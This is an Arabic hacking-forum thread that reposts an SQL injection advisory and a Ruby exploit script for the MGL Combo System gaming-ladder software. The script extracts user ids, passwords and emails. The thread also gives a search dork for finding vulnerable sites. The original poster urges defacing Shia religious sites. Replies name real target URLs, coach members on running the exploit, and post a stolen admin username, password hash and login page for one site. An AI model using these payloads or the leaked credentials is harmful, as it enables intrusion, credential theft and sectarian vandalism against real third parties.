سكربت mygamingladder MGL Combo System مصاب مواقع شيعيه كثيره

[Marine]

# Title: mygamingladder MGL Combo System <= 7.5 SQL injection
# EDB-ID: 12135
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Easy Laster
# Published: 2010-04-10
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
----------------------------Information------------------------------------------------
+Name : mygamingladder MGL Combo System <= 7.5 SQL injection Vulnerability & SQL injection Exploit
+Autor : Easy Laster
+Date   : 10.04.2010
+Script  : mygamingladder MGL Combo System <= 7.5
+Download : ------------------
+Demo : http://www.mygamingladder.com/upgrade/combo/
+Price : 120$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project 4004-security-project.com
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.
 
---------------------------------------------------------------------------------------
                                                                                      
 ___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 
                                              |___|                 |___|           
 
 
----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/game/news.php?newsid=
 
 
+Exploitable   : http://www.site.com/game/news.php?newsid=1'/**/UNION/**/SELECT+1,
concat(id,0x3a,pass,0x3a,email),3,4/**/from/**/users/**/WHERE/**/id=1--+
 
 
-----------------------------------------------------------------------------------------
 
#Exploit
 
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
#            4004-Security-Project                      #
#########################################################
#             mygamingladder MGL Combo System 7.5       #
#                          Exploit                      #
#                     Using Host+Path                   #
#                     www.demo.de /forum/               #
#                         Easy Laster                   #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
begin
dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed"
end

الدورك

inurl:news.php?newsid=

لا وصيكم بالتنتيف

مواقع شيعيه حسينيه مركبته كثيير

تحياتي يزيد العتيبي

 

[MOON14]

أخوي طبق لنا على موقع لأني جربت على مواقع كثيرة ما نجحت
ولك جزيل الشكر

 

[Marine]

لا تحط الاستغلال الموجود حاول انك تكتبه يدوي

 

[MOON14]

طبق على هذا
http://www.noaim.net/news.php?newsid=1909
جريت ما نجح
وشكرا

 

[MOON14]

كتيت ما نجح أخوي
ممكن تكتبه لنا من جديد

 

[Marine]

مصاب

http://www.noaim.net/news.php?newsid=1909'

جرب خش ورح تشوف ذ

 

[MOON14]

http://www.noaim.net/news.php?newsi...ail),3,4/**/from/**/users/**/WHERE/**/id=1--+

ما ظهر شيئ أخوي شوفي لي حل

 

[MOON14]

أخوي عططني موقع أنت طبقت عليه ونجح
خلينا نشوف كيف الحقنة تنكتب
شكرا

 

[ehabamr]

مشكور يايزيد

 

[Marine]

ياقمر احقن انت

http://www.abather.net/news.php?newsid=1041

ايهاب منور الموضوع

 

[ehabamr]

اخى الكريم يزيد اولا الف شكر على المجهود

ثانيا ارجو منك ان تشرح لى كيف استطيع استخدام الثغره

استخدام صحيح واعتذر ان كنت سوف ااخذ من وقتك ولكن ارجو المعذره

لتعم الفائده على الجميع

اشكرك مره اخرى

ايهاب

 

[H3x HaCkeR]

[align=center]^

لازم تسسطب برنامج ترجمة لغة الربي ruby بعدها خش للدوس

\cd

وبعدها

cd ruby

الحين بتخش على مجلد الربي ruby

اجفظ الثغرة بامتداد rb ونسميها vbspiders

نكتب

ruby vbspiders.rb

انتر والسلام عليكم

وتمت الترجمة :$[/align]

 

[ehabamr]

اخى الكريم انا فعلا عملت كده والنتيجه كانت

#
#########################################################
# mygamingladder MGL Combo System 7.5 #
# Exploit #
# Using Host+Path #
# www.demo.de /forum/ #
# Easy Laster #
#########################################################


صح اريد التطبيق

Using Host+Path
www.demo.de /forum/
#

 

[Marine]

ماقصر معك الاخ

تحط البيانات هنا

حقت الموقع




Using Host+Path
www.demo.de /forum/
#

 

[Art design]

نجح 100% بارك الله فيك لكن يوجد مشكل الباس المشفر ممكن موقع معتمد ؟؟

 

[Art design]

http://www.simbin.se/news.php?newsid=120
user : newsadmin
Pass : fb77bb3fb971d583ebb3cd8ddc61b299cecee108
login : http://www.simbin.se/admin/

 

[Dr.NaNo]

مشكور يابطل , وجاري القنص لووووول


. بالنسبه للشباب الي مايعرفون ، يحقنون ، أتمنى تتابعون دورة الاخ [ فلكانو تبع الحقن ..]..


وهذا رابط الدورة هنا في المنتدى .:

http://www.vbspiders.com/vb/f236.html


وتحياتي لك يا يزيد العتيبي ..




بالتوفيق

 

[Marine]

Ahlen all

Mn0ren